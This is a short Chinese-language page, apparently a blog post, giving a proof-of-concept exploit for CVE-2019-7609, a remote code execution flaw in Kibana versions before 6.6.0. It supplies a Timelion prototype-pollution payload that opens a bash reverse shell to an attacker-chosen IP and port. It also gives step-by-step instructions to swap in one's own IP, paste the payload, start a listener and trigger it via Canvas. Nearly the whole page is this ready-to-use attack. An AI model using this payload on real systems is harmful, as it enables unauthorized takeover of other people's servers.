# CVE-2019-7609 kibana 未授權遠程代碼執行漏洞
==影響版本==
kibana<6.6.0
==POC==
將POC裡的反鏈IP地址換成自己的,然後在目標機器上的 Timelion 選項下將以下 POC 粘貼進去,點擊 Run 運行
.es(*).props(label.__proto__.env.AAAA=’require(“child_process”).exec(“bash -i >& /dev/tcp/10.10.20.166/8989 0>&1”);process.exit()//’) .props(label.__proto__.env.NODE_OPTIONS=’–require /proc/self/environ’)
攻擊機器开启监听,点击 Canvas 即可觸發漏洞。
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
请登录后查看评论内容